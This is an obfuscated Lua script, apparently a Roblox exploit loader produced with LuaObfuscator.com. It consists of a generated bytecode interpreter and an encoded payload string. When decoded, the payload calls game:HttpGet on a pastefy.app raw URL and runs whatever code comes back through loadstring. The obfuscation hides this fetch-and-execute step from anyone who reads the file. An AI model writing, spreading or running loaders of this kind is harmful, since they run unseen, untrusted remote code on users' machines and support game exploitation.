--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v79=0;while true do if (v79==0) then v19=v0(v3(v30,1,1));return "";end end else local v80=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v80,v19);v19=nil;v90=1;end end else return v80;end end end);local function v20(v31,v32,v33) if v33 then local v81=(v31/((1 + 1)^(v32-(878 -(282 + 595)))))%(((11 -6) -(5 -2))^(((v33-(2 -1)) -(v32-(1 -0))) + (2 -1))) ;return v81-(v81%(1271 -(226 + 232 + 812))) ;else local v82=619 -(555 + 64) ;local v83;while true do if (v82==(931 -(857 + (1031 -(892 + 65))))) then v83=(570 -(367 + 201))^(v32-(928 -((392 -178) + 713))) ;return (((v31%(v83 + v83))>=v83) and (1 + 0)) or (0 + 0) ;end end end end local function v21() local v34=350 -(87 + 263) ;local v35;while true do if (v34==(181 -(67 + 84 + 29))) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=2 -1 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (954 -(802 + 150)) );v18=v18 + 2 ;return (v37 * (464 -208)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (3 -0) );v18=v18 + 3 + 1 ;return (v41 * (16778213 -(915 + 82))) + (v40 * (185570 -120034)) + (v39 * (150 + 106)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1188 -(1069 + 118) ;local v45=(v20(v43,(1 + 1) -1 ,43 -23 ) * ((1 + 1)^32)) + v42 ;local v46=v20(v43,37 -(14 + 2) ,31 + 0 );local v47=((v20(v43,32)==(792 -(368 + 423))) and  -(3 -2)) or 1 ;if (v46==(18 -(10 + 8))) then if (v45==(0 -(772 -(201 + 571)))) then return v47 * (442 -(416 + 26)) ;else v46=1;v44=0 -(1138 -(116 + 1022)) ;end elseif (v46==2047) then return ((v45==(0 + (0 -0))) and (v47 * ((1 -0)/(438 -(86 + 59 + 293))))) or (v47 * NaN) ;end return v8(v47,v46-(1453 -(44 + 386)) ) * (v44 + (v45/(2^(1538 -((3643 -2645) + 488))))) ;end local function v25(v48) local v49=0 -0 ;local v50;local v51;while true do if (v49==((339 + 521) -(814 + 45))) then v50=v3(v16,v18,(v18 + v48) -(2 -1) );v18=v18 + v48 ;v49=1 + 1 ;end if (v49==(1 + (3 -2))) then v51={};for v92=886 -(261 + 624) , #v50 do v51[v92]=v2(v1(v3(v50,v92,v92)));end v49=4 -(1748 -(760 + 987)) ;end if (v49==(1080 -(1020 + 60))) then v50=nil;if  not v48 then local v102=(3336 -(1789 + 124)) -(630 + 793) ;while true do if (v102==0) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=1;end if (v49==(14 -11)) then return v6(v51);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0 + 0 ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if ((1639 -(195 + 1442))~=v52) then else for v94= #":",v23() do local v95=(function() return v21();end)();if (v20(v95, #" ", #"|")==0) then local v103=(function() return 0 -0 ;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if (v103~=1) then else v106=(function() return {v22(),v22(),nil,nil};end)();if (v104==0) then local v147=(function() return 0 + 0 ;end)();local v148=(function() return;end)();while true do if (v147==(396 -(115 + 281))) then v148=(function() return 0;end)();while true do if (v148==(0 -0)) then v106[ #"xxx"]=(function() return v22();end)();v106[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v104== #"}") then v106[ #"nil"]=(function() return v23();end)();elseif (v104==2) then v106[ #"91("]=(function() return v23() -((2 + 0)^(38 -22)) ;end)();elseif (v104~= #"xnx") then else local v171=(function() return 0;end)();local v172=(function() return;end)();while true do if (v171==(0 -0)) then v172=(function() return 0;end)();while true do if (v172==(867 -(550 + 317))) then v106[ #"-19"]=(function() return v23() -((2 -0)^(22 -6)) ;end)();v106[ #"?id="]=(function() return v22();end)();break;end end break;end end end v103=(function() return 2;end)();end if (2==v103) then if (v20(v105, #"!", #":")~= #"<") then else v106[2]=(function() return v58[v106[5 -3 ]];end)();end if (v20(v105,2,2)~= #":") then else v106[ #"19("]=(function() return v58[v106[ #"91("]];end)();end v103=(function() return 3;end)();end if ((288 -(134 + 151))~=v103) then else if (v20(v105, #"19(", #"19(")== #",") then v106[ #"http"]=(function() return v58[v106[ #"0313"]];end)();end v53[v94]=(function() return v106;end)();break;end if (v103==(1665 -(970 + 695))) then local v108=(function() return 0 -0 ;end)();local v109=(function() return;end)();while true do if (v108==0) then v109=(function() return 1990 -(582 + 1408) ;end)();while true do if (v109==(3 -2)) then v103=(function() return 1 -0 ;end)();break;end if (v109~=(0 -0)) then else v104=(function() return v20(v95,2, #"xxx");end)();v105=(function() return v20(v95, #"asd1",6);end)();v109=(function() return 1;end)();end end break;end end end end end end for v96= #">",v23() do v54[v96-#"~" ]=(function() return v28();end)();end return v56;end if ( #" "~=v52) then else local v87=(function() return 0;end)();local v88=(function() return;end)();while true do if (v87~=(1824 -(1195 + 629))) then else v88=(function() return 0 -0 ;end)();while true do if (v88==0) then v57=(function() return v23();end)();v58=(function() return {};end)();v88=(function() return 242 -(187 + 54) ;end)();end if (v88~=(781 -(162 + 618))) then else for v111= #":",v57 do local v112=(function() return 0;end)();local v113=(function() return;end)();local v114=(function() return;end)();local v115=(function() return;end)();while true do if (v112==(1 + 0)) then v115=(function() return nil;end)();while true do if (v113~=0) then else v114=(function() return v21();end)();v115=(function() return nil;end)();v113=(function() return 1;end)();end if ((1 + 0)==v113) then if (v114== #"[") then v115=(function() return v21()~=(0 -0) ;end)();elseif (v114==2) then v115=(function() return v24();end)();elseif (v114== #"asd") then v115=(function() return v25();end)();end v58[v111]=(function() return v115;end)();break;end end break;end if (v112~=(0 -0)) then else v113=(function() return 0;end)();v114=(function() return nil;end)();v112=(function() return 1;end)();end end end v56[ #"19("]=(function() return v21();end)();v88=(function() return 2;end)();end if (v88==(1 + 1)) then v52=(function() return 2;end)();break;end end break;end end end if (v52==0) then local v89=(function() return 1636 -(1373 + 263) ;end)();while true do if (2~=v89) then else v52=(function() return  #"/";end)();break;end if ((1000 -(451 + 549))==v89) then v53=(function() return {};end)();v54=(function() return {};end)();v89=(function() return 1;end)();end if (v89==(1 + 0)) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v89=(function() return 2;end)();end end end end end local function v29(v59,v60,v61) local v62=v59[1];local v63=v59[2 -0 ];local v64=v59[(11 -7) -1 ];return function(...) local v65=v62;local v66=v63;local v67=v64;local v68=v27;local v69=2 -1 ;local v70= -(2 -1);local v71={};local v72={...};local v73=v12("#",...) -((257 -142) -(4 + 110)) ;local v74={};local v75={};for v84=0 + 0 ,v73 do if (v84>=v67) then v71[v84-v67 ]=v72[v84 + (1 -0) ];else v75[v84]=v72[v84 + (104 -(17 + 86)) ];end end local v76=(v73-v67) + 1 ;local v77;local v78;while true do v77=v65[v69];v78=v77[1 + 0 + 0 ];if (v78<=(33 -26)) then if (v78<=(344 -(218 + 123))) then if (v78<=(1582 -(1535 + 46))) then if ((v78==((753 -(239 + 514)) + 0)) or (3755<=915)) then v75[v77[1 + 1 ]]={};else v75[v77[562 -(306 + 254) ]]={};end elseif (v78>(1 + 0 + 1)) then local v118=0 -0 ;local v119;while true do if (v118==((1329 -(797 + 532)) -0)) then v119=v77[2];v75[v119]=v75[v119](v13(v75,v119 + (1468 -(899 + 568)) ,v70));break;end end else do return;end end elseif ((3946>3743) and (v78<=5)) then if ((v78>(3 + 1)) or (4372==1850)) then v75[v77[4 -2 ]]=v77[3];else v75[v77[605 -(268 + 335) ]]();end elseif (v78==(296 -(60 + 230))) then do return;end else v75[v77[574 -(426 + 146) ]]();end elseif (v78<=(2 + 9)) then if (v78<=9) then if (v78>(328 -(53 + 267))) then local v122=v77[1 + 1 ];local v123=v75[v77[1459 -(282 + 854 + 320) ]];v75[v122 + (812 -(569 + 242)) ]=v123;v75[v122]=v123[v77[11 -7 ]];else v75[v77[1 + 1 ]]=v77[1 + 2 ];end elseif (v78==(1034 -(706 + 318))) then v75[v77[2]]=v61[v77[(2948 -1694) -((1923 -(373 + 829)) + 530) ]];else local v131=1271 -(945 + 326) ;local v132;local v133;while true do if (v131==(2 -1)) then v75[v132 + 1 + 0 ]=v133;v75[v132]=v133[v77[704 -(271 + 429) ]];break;end if (((232<821) and (v131==((731 -(476 + 255)) + 0))) or (1335>=3306)) then v132=v77[2];v133=v75[v77[1503 -((2538 -(369 + 761)) + 92) ]];v131=1087 -(461 + 625) ;end end end elseif ((4844>2253) and (v78<=(1301 -(993 + 171 + 124)))) then if ((452==452) and (v78>12)) then local v134=v77[2 + 0 ];local v135,v136=v68(v75[v134](v13(v75,v134 + 1 + 0 ,v77[1174 -(418 + 753) ])));v70=(v136 + v134) -(1 + 0) ;local v137=0 + 0 ;for v152=v134,v70 do v137=v137 + (406 -((214 -96) + (543 -256))) ;v75[v152]=v135[v137];end else v75[v77[1 + 1 ]]=v61[v77[(249 -(64 + 174)) -8 ]];end elseif (((518<902) and (v78==(4 + 10))) or (4557<2087)) then local v140=v77[5 -3 ];v75[v140]=v75[v140](v13(v75,v140 + (530 -(406 + 123)) ,v70));else local v142=1769 -(1749 + 20) ;local v143;local v144;local v145;local v146;while true do if ((3874==3874) and (v142==(1 + 0))) then v70=(v145 + v143) -(978 -(553 + 424)) ;v146=0 -0 ;v142=1324 -(1249 + 73) ;end if (v142==(1 + 1)) then for v164=v143,v70 do v146=v146 + (1146 -(466 + 679)) ;v75[v164]=v144[v146];end break;end if (((2994>858) and (v142==(0 -0))) or (1938>4935)) then v143=v77[2 + 0 ];v144,v145=v68(v75[v143](v13(v75,v143 + (2 -1) ,v77[3])));v142=1901 -(106 + 1794) ;end end end v69=v69 + (2 -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F6466714E634E77792F72617700099Q003Q00120C000100013Q00120C000200023Q00200B000200020003001205000400044Q000F000200044Q000E00013Q00022Q00040001000100012Q00063Q00017Q00",v9(),...);
